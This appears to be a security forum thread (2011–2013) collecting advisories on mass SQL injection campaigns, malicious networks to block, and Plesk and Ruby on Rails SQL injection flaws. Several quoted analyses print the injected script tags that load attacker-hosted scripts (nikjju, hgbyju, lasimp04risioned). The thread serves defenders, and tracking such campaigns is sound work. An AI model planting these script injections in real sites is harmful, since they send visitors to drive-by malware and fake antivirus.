Bitch Board

[Mass SQL Injection attack hits 1 million sites]

FYI...

Mass SQL Injection attack hits 1 million sites
- http://www.darkreading.com/taxonomy/index/printarticle/id/231901236
Oct 19, 2011 - "A mass-injection attack similar to the highly publicized LizaMoon attacks this past spring has infected more than 1 million ASP.NET Web pages, Armorize researchers said*... According to database security experts, the SQL injection technique used in this attack depends on the same sloppy misconfiguration of website servers and back-end databases that led to LizaMoon's infiltration. "This is very similar to LizaMoon," says Wayne Huang, CEO of Armorize, who, with his team, first reported of an injected script dropped on ASP.NET websites that load an iFrame to initiate browser-based drive-by download exploits on visitor browsers to the site. Initial reports by Armorize showed that 180,000 Web pages had been hit* by the offending script, but Huang told Dark Reading that a Google search resulted in returns for more than 1 million Web pages containing the injected code..."
* http://blog.armorize.com/2011/10/httpjjghuicomurchinjs-mass-infection.html
"... The scripts causes the visiting browser to load an iframe first from www3 .strongdefenseiz .in and then from www 2.safetosecurity .rr.nu. Multiple browser-based drive-by download exploits are served depending on the visiting browser... if they have outdated browsing platforms (browser or Adobe PDF or Adobe Flash or Java etc). This wave of mass injection incident is targeting ASP ASP.NET websites..."
> https://www.virustotal.com/file-scan/report.html?id=1ba709f9c643260b82419c61ab7c21b428226a97642e575f4066a4847c3877aa-1319203779
File name: file-2979089_
Submission date: 2011-10-21 13:29:39 (UTC)
Result: 30/42 (71.4%)
___

Dissecting the Ongoing Mass SQL Injection Attack
- http://ddanchev.blogspot.com/2011/10/dissecting-ongoing-mass-sql-injection.html
Oct 20, 2011

- https://encrypted.google.com/ ...
Oct. 25, 2011 - "... about 1,610,000 results..."

 

[Urgent Block: lilupophilupop-dot-com (SQL Injection)]

FYI...

Urgent Block: lilupophilupop-dot-com (SQL Injection)
- http://www.malwaredomains.com/wordpress/?p=2213
December 2nd, 2011 - "(The ISC*) is reporting that there’s a SQLi campaign going on right now with the malicious domain lilupophilupop .com being injected into sites running MSSQL. We will block that domain on the next update but you shouldn’t wait…"
* https://isc.sans.edu/diary.html?storyid=12127
Last Updated: 2011-12-02 11:24:01 UTC - "... discovered yesterday about 80 sites showed in Google... and a few minutes ago 4000+. Targets include ASP sites and Coldfusion...  The attack seems to work on all versions of MSSQL..."
___

Diagnostic page for AS:48691 (SPECIALIST)
- http://google.com/safebrowsing/diagnostic?site=AS:48691
"... The last time Google tested a site on this network was on 2011-12-10, and the last time suspicious content was found was on 2011-12-10... Over the past 90 days, we found 15 site(s) on this network, including, for example, lilupophilupop .com, sweepstakesandcontestsinfo .com, sweepstakesandcontestsnow .com... that appeared to function as intermediaries for the infection of 189 other site(s)... We found 30 site(s), including, for example, lilupophilupop .com, sweepstakesandcontestsinfo .com, sweepstakesandcontestsnow .com, that infected 1504 other site(s)..."

- http://blog.dynamoo.com/2010/10/evil-network-specialist-ltd-specialist.html
11 October 2010 - "...blocking 194.28.112.0 - 194.28.115.255 (194.28.112.0/22) is probably a good idea..."
inetnum: 194.28.112.0 - 194.28.115.255
netname: Specialist-ISP-PI2
descr:   Specialist, Ltd.
Country: MD (Moldova)

- https://blogs.msdn.com/themes/blogs/generic/post.aspx?WeblogApp=alexhomer&y=2011&m=02&d=06&WeblogPostName=blocking-malware-domains-in-isa-2006&GroupKeys=
"... malware that connects using an IP address instead of a domain name will -not- be blocked when you use just domain name lists..."

 

[160,000 sites]

FYI... Significant SQLi inroads/growth continue... status update:

RE: https://isc.sans.edu/diary.html?storyid=12127
UPDATE 8/12/2011 - "... number of sites infected is about 160,000 sites..."

Updated: 2011-12-29: Diagnostic page for AS:48691 (SPECIALIST)
- http://google.com/safebrowsing/diagnostic?site=AS:48691
"... The last time Google tested a site on this network was on 2011-12-29, and the last time suspicious content was found was on 2011-12-29... Over the past 90 days, we found 124 site(s) on this network, including, for example, lilupophilupop .com, sweepstakesandcontestsinfo .com... that appeared to function as intermediaries for the infection of 507 other site(s)... We found 300 site(s), including, for example, lilupophilupop .com, sweepstakesandcontestsinfo .com... that infected 5064 other site(s)..."
___

- http://blog.dynamoo.com/2011/12/evil-network-revisited-specialist-ltd.html
12 December 2011 - "... the number of malicious sites has dropped, but there is still not a legitimate site in sight... you should -block- access to 194.28.112.0/22 (194.28.112.0 - 194.28.115.255) if you can, because this range of IP addresses is nothing but trouble..."

- https://blogs.msdn.com/themes/blogs/generic/post.aspx?WeblogApp=alexhomer&y=2011&m=02&d=06&WeblogPostName=blocking-malware-domains-in-isa-2006&GroupKeys=
"... malware that connects using an IP address instead of a domain name will -not- be blocked when you use just domain name lists..."

i.e.: https://zeustracker.abuse.ch/blocklist.php
"... some ZeuS hosts are just hosted on an ip address and not on a domain..."

 

[Lilupophilupop tops 1 million infected pages]

FYI...

- http://blog.imperva.com/2012/01/sql-injection.html
January 05, 2012
___

Lilupophilupop tops 1 million infected pages
- https://isc.sans.edu/diary.html?storyid=12304
Last Updated: 2011-12-31 07:33:00 UTC - "... SQL injection attacks... about 1,070,000 in fact... to give you a rough idea of where the pages are:
UK - 56,300, NL - 123,000, DE - 49,700, FR - 68,100, DK - 31,000, CN - 505, CA - 16,600,  COM - 30,500, RU - 32,000, JP - 23,200, ORG - 2,690..."

Updated: 2012-01-05: Diagnostic page for AS48691 (SPECIALIST)
- http://google.com/safebrowsing/diagnostic?site=AS:48691
"... The last time Google tested a site on this network was on 2012-01-05, and the last time suspicious content was found was on 2012-01-05... Over the past 90 days, we found 148 site(s) on this network, including, for example, lilupophilupop .com, sweepstakesandcontestsinfo .com... that appeared to function as intermediaries for the infection of 591 other site(s)... We found 452 site(s), including, for example, lilupophilupop .com, sweepstakesandcontestsinfo .com... that infected 5522 other site(s)..."

- http://blog.dynamoo.com/2011/12/evil-network-revisited-specialist-ltd.html
12 December 2011 - "... No UN members recognise Transnistria*, and effectively it sits beyond the reach of international law enforcement... you should -block- access to 194.28.112.0/22 (194.28.112.0 - 194.28.115.255)..."

* https://en.wikipedia.org/wiki/Transnistria#International_relations
___

- http://www.malwaredomains.com/wordpress/?p=2338
January 3rd, 2012

- http://centralops.net/co/DomainDossier.aspx
... Information related to '194.28.112.0 - 194.28.115.255'...
netname: Specialist-ISP-PI2
descr:   Specialist, Ltd.
country: MD ...
route:   194.28.112.0/22
origin:  AS48691 ...

 

[Injection code masquerades as Google Analytics]

FYI...

Injection code masquerades as Google Analytics
- http://community.websense.com/blogs/securitylabs/archive/2012/02/07/injection-code-masquerade-as-google-analytics.aspx
7 Feb 2012 - "Websense... has discovered a new wave of injection of malicious code disguising itself as Google Analytics, by adopting similar code snippets and malicious domains... We found other similar domains like google-analytics[dot]su in this attack... it is highly obfuscated, hard to understand, but after all tricks it finally will -redirect- to IP address 37.59.74.145 which hosts Black Hole Exploit..."
(More detail at the websense URL above.)

 

[Plesk admin software actively exploited]

FYI...

Plesk admin software actively exploited...
- http://h-online.com/-1446587
1 March 2012 - "A critical security vulnerability in the Plesk administration program is currently being actively used to compromise affected servers. Plesk is used most often by hosting providers and provides a web front-end for administering rented servers. The vulnerability seems to be an SQL injection problem, which an attacker can exploit to gain full administrative access to a system. Linux and Windows versions of Parallels Plesk Panel 7.6.1 - 10.3.1 are affected. Parallels, the company that publishes the software, has already fixed the vulnerability in the current versions and is even offering micro-updates whose only purpose is to fix the problem. Administrators should check the status of their Plesk version* immediately."
* http://kb.parallels.com/en/9294

Security advisory from Parallels: http://kb.parallels.com/en/113321

 

[Mass SQL injection campaign]

FYI...

Mass SQL injection campaign (180k+ pages compromised)
- http://blog.sucuri.net/2012/04/nikjju-mass-injection-campaign-150k-sites-compromised.html
April 17, 2012 - "... tracking a new mass SQL injection campaign that started early this month. So far more than 180,000 URLs have been compromised. We will keep posting updates as we get them. Nikjju is a mass SQL injection campaign targeting ASP/ASP.net sites (very similar to lizamoon from last year). When successful, it adds the following javascript to the compromised sites:
<script src= http ://nikjju .com/r.php ></script>
This is used to redirect anyone visiting the infected websites to Fake/Rogue AVs (best-antiviruu .de .lv – mostly targeting Windows users). All the sites we analysed so far are Windows-based servers running ASP/ASP.net compromised via SQL injection... So far Google has identified 188,000 pages infected with that javascript call, but the number is growing really fast. It was less than 130,000 yesterday afternoon... The domain Nikjju .com (31.210.100.242) was registered April 1st and we started to see the first batch of compromised sites a few days after (April 4th)... If your suspect your site has been compromised, you can verify it on Sucuri SiteCheck (free scanner*). You will also need to audit your code to make sure that any user input is sanitized before use...
We are seeing a few small .gov sites compromised as well (mostly from China):
    jnd .xmchengdu .gov .cn
    study .dyny .gov .cn
    cnll .gov .cn
    bj .hzjcy .gov .cn
    mirpurkhas .gov .pk
    tdnyw .gov .cn
    gcjs .kaifeng .gov .cn ..."

* http://sitecheck.sucuri.net/scanner/

Urgent Block: nikjju .com and best-antiviruu .de .lv
- http://www.malwaredomains.com/wordpress/?p=2606
April 17th, 2012

Nikjju Mass injection campaign (150k+ sites compromised)
> http://atlas.arbor.net/briefs/
Severity: Elevated Severity
Published: Thursday, April 19, 2012 15:40
Another mass SQL injection campaign is underway, affecting vulnerable ASP and ASP.NET sites.
Analysis: While SQL injection vulnerabilities have been known for years, they continue to cause problems ranging from mass injection attacks used to install malware on vulnerable site vistors to more serious attacks that exfiltrate sensitive data for personal, political or financial means. Attackers can also leverage a SQL injection issue to penetrate deeper into a network and move laterally, compromising targeted resources along the way. Code review and proper web application security assessment can help detect such bugs before criminals use them for malicious ends...

 

[now hgbyju .com/r.php]

FYI...

Nikjju SQL injection update (now hgbyju .com/r.php)
- http://blog.sucuri.net/2012/04/nikjju-sql-injection-update-now-hgbyju-comr-php.html
April 22, 2012 - "We posted a few days ago about a Mass SQL injection campaign* that has been compromising thousands of sites. Our latest numbers show more than 200,000 pages got infected with the nikjju .com malware. However, since the last two days, the attackers switched domain names and are now using hgbyju .com to distribute their malware (also hosted at 31.210.100.242). So the following code is now getting added to the compromised web sites:
    <script src = http ://hgbyju .com/r.php <</script> ..."
* http://blog.sucuri.net/2012/04/nikjju-mass-injection-campaign-150k-sites-compromised.html
April 17, 2012
___

- https://isc.sans.edu/diary.html?storyid=13036
Last Updated: 2012-04-24 00:17:18 UTC - "... resulting fake/rogue AV campaigns they subject victims to..."

- http://google.com/safebrowsing/diagnostic?site=nikjju.com
"... the last time suspicious content was found on this site was on 2012-04-24. Malicious software includes 19 trojan(s), 3 exploit(s)..."
- http://google.com/safebrowsing/diagnostic?site=hgbyju.com
"... the last time suspicious content was found on this site was on 2012-04-23. Malicious software includes 2 trojan(s)..."
- http://google.com/safebrowsing/diagnostic?site=AS:42926
"... over the past 90 days, 404 site(s),... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2012-04-24, and the last time suspicious content was found was on 2012-04-24..."

 

[Automated Attacks]

FYI...

- http://blog.spiderlabs.com/2012/05/mass-sql-injection-payload-analysis.html
01 May 2012
> https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
___

Automated Attacks - SQL injection and RFI/LFI attacks
- http://blog.imperva.com/2012/04/automated-attacks.html
April 25, 2012 - "... cloud-security provider Incapsula published a study* showing that 31 percent of website traffic was -malicious- traffic... interesting is the speed and effectiveness of the hacks. How was it achieved? Automation. Automated hacks are not new.  However, recently, we have noticed increased sophistication... this month’s Imperva’s latest Hacker Intelligence Initiative report** is to give a "state of the union" when it comes to automated attacks. Specifically, we describe the key tools and processes hackers use to automate SQL injection and RFI/LFI attacks. We believe these are the two most deployed attack methods and, as in any industry—automation, is a key indicator that someone wishes to achieve an economy of scale. Further, the automated tools being developed are sophisticated. This means:
• The script kiddies are hitting puberty. In other words, their attacks will be more effective and through.
• The pool of hackers is likely to increase. The ease of use of these tools is a key component of their appeal... hacking tools is a cottage industry trying to appeal to those hoping for a few online thrills.
Our report can be downloaded here**. The report details:
• Commonly used automated SQL injection and RFI/LFI tools.
• How to identify them when they hit your website.
• Some strategies needed to stop them."

* http://www.incapsula.com/the-incapsula-blog/item/225-what-google-doesnt-show-you-31-of-website-traffic-can-harm-your-business

** http://www.imperva.com/download.asp?id=360
PDF file - 12 pgs. - "... Summary and Conclusions: With automation, the odds of cyber attack are close to 100%. How can security teams prepare and stop malicious, automated site traffic in order to:
› Block attacks early and efficiently.
› Defend against 0 days.
› To save analysis resources by clustering all attack vectors related to the same attack to a single group. Detecting automation require abilities greater than plain signatures. Moreover, detecting bad automation must also allow non-malicious automation...
Contending with automated attacks requires:
› Rate-based detection mechanism: Automated tools often interact with sites at inhuman speeds. Signatures, however, are usually confined to single event. The ability to detect inhuman interactions is a key step.
› Missing or unique headers: Signatures are good at detecting existing pattern not in detecting missing pieces. Automated tools often lack headers, divulging their ulterior intentions. But malicious automation can be distinguished by its use of unique headers or payloads.
› Identify by using the experience of others (reputation): Automated attacks sources tend to attack many targets."

   

[Malware Analysis - compromised sites April 2012]

FYI...

Malware Analysis - compromised sites April 2012
- http://blog.sucuri.net/2012/05/april2012-malware-analysis.html
May 1, 2012 - "When we see a compromised site distributing malware, it is often done via 4 methods: Iframe, Javascript, Spam or internal redirections. Those are not the only ways, and they can be encoded or hidden differently internally on the sites, but the final output on the compromised sites is generally one of them:
1. Iframe injection: It makes the browser loads content from external (and malicious web sites)...
2. Javascript injection: Used to encode (hide) calls to iframes or additional remote javascript includes...
3. .htaccess (or conditional) redirections: Used to redirect anyone visiting the site from search engines (or specific user agents/ referers) to malware or spam content.
4. Blackhat SEO spam: It is not really malware in the sense of the word (since it won’t infect anyone visiting the site), but it is still harmful for the webmaster and the site’s reputation (imagine a corporate site redirecting to a viagra online store).
- April / 2012 stats
Last month, we scanned a LOT of sites and many of them (107,616 to be more precise) were compromised. This is the breakdown per infection type:
• Iframe injection: 52.6%
• Javascript injection: 26.5%
• Blackhat SEO spam: 10.1%
• .htaccess redirections: 7.3%
• Other: 3% ..."
(More detail at the sucuri URL above.)

   

[Another SQL-i attack - njukol-dot–com]

FYI...

Another SQL-i attack - njukol-dot–com ...
- https://www.f-secure.com/weblog/archives/00002357.html
May 3, 2012 - "... the name is no longer as catchy as Lizamoon, the idea remains the same. This njukol .com is still pretty fresh out of the oven. The domain was registered last April 28*... the registrant of the domain is still the same with all those previous ones."
* https://www.f-secure.com/weblog/archives/registrant.png

- http://www.malwaredomains.com/wordpress/?p=2644
April 29th, 2012 - "... add this to your block or shun list."

 

[SQL injection]

FYI...

SQL injection... "lasimp04risioned"
- https://isc.sans.edu/diary.html?storyid=13813
Last Updated: 2012-07-31 21:47:00 UTC - "It's been a while since we published the diary about the lilupophilupop SQL injection ( https://isc.sans.edu/diary.html?storyid=12127 ) that back in January had infected LOTS of web sites. But guess what, they are b-aaa-ck, and are trying pretty much the same thing... decoded looks as...
<script src="http ://lasimp04risioned. rr.nu/sl.php"></script> ...
Searching for the injected "lasimp04risioned" URL via Google shows that the bad guys don't seem to be as 'successful' with this attack as last time, but this can change..."

2012-08-01 11:55:15 UTC: https://isc.sans.edu/diary.html?storyid=13813#comment
(Also seen) ... <script src="http ://xinthesidersdown .com/sl.php"></script> ...

2012-08-02 16:29 UTC: https://isc.sans.edu/diary.html?storyid=13813#comment
 ... hxxp: //eighbo02rsbarr. rr.nu/sl.php...

 

[SQL injection vuln]

FYI...

SQL injection vuln - all Ruby on Rails...
- http://h-online.com/-1776203
3 Jan 2013 - "The Ruby on Rails developers are warning of an SQL injection vulnerability that affects all current versions of the web framework. New releases of Ruby on Rails – 3.2.10, 3.1.9 and 3.0.18 – are now available. It is recommended that all users update immediately. For users unable to update, there are patches available* for supported versions 3.2 and 3.1 and older versions 3.0 and 2.3. The problem, according to the advisory, is that, because of the way dynamic finders in ActiveRecord extract options from method parameters, a method parameter can be used as a scope and by carefully manipulating that scope, users can inject arbitrary SQL..."
* http://weblog.rubyonrails.org/2013/1/2/Rails-3-2-10--3-1-9--and-3-0-18-have-been-released/
Jan 2, 2013

- https://secunia.com/advisories/51697/
Last Update: 2013-01-04
Criticality level: Moderately critical
Impact: Manipulation of data
Where: From remote
... vulnerability is reported in versions prior to 3.0.18, prior to 3.1.9, and prior to 3.2.10.
Solution: Update to version 3.2.10, 3.1.9, or 3.0.18 or apply patch**.
** https://groups.google.com/forum/?fromgroups=#!topic/rubyonrails-security/DCNTNp_qjFM
___

- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-5664
Last revised: 01/08/2013 - "... consult CVE-2012-6496 and CVE-2012-6497 to determine which ID is appropriate..."
- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-6496 - 7.5 (HIGH)
Last revised: 01/07/2013
- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-6497 - 5.0
Last revised: 01/04/2013

   

[Ruby on Rails - Unsafe Queries]

FYI...

Ruby on Rails - Unsafe Queries ...
- http://www.securitytracker.com/id/1027960
CVE Reference: CVE-2013-0155
Jan 9 2013
Impact: Modification of system information
Fix Available:  Yes  Vendor Confirmed:  Yes 
Version(s): 3.x prior to versions 3.0.19, 3.1.10, and 3.2.11
Description: A vulnerability was reported in Ruby on Rails. A remote user can generate unsafe queries...
The vendor's advisories are available at:
- http://weblog.rubyonrails.org/2013/1/8/Rails-3-2-11-3-1-10-3-0-19-and-2-3-15-have-been-released/
Jan 8, 2013 - "... two extremely critical security fixes so please update IMMEDIATELY..."
- https://groups.google.com/forum/?fromgroups=#!topic/rubyonrails-security/t1WFuuQyavI

- http://www.securitytracker.com/id/1027961
CVE Reference: CVE-2013-0156
Jan 9 2013
Impact: Denial of service via network, Disclosure of user information, Execution of arbitrary code via network, Modification of user information, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes 
Version(s): 2.x and 3.x prior to versions 2.3.15, 3.0.19, 3.1.10, and 3.2.11
Description: A vulnerability was reported in Ruby on Rails. A remote user can bypass authentication systems, inject SQL commands, inject and execute arbitrary code, and cause denial of service conditions...
The vendor's advisories are available at:
- http://weblog.rubyonrails.org/2013/1/8/Rails-3-2-11-3-1-10-3-0-19-and-2-3-15-have-been-released/
- https://groups.google.com/forum/#!topic/rubyonrails-security/61bkgvnSGTQ
Jan 8, 2013 - "... either upgrade or use one of the work arounds *immediately*..."

- https://community.rapid7.com/community/metasploit/blog/2013/01/09/serialization-mischief-in-ruby-land-cve-2013-0156
HD Moore - Jan 9, 2013

- https://secunia.com/advisories/51753/
Release Date: 2013-01-09
Criticality level: Highly critical
Impact: System access
Where: From remote...
Solution Status: Vendor Patch
CVE Reference(s): CVE-2013-0155, CVE-2013-0156

- http://h-online.com/-1780073
9 Jan 2013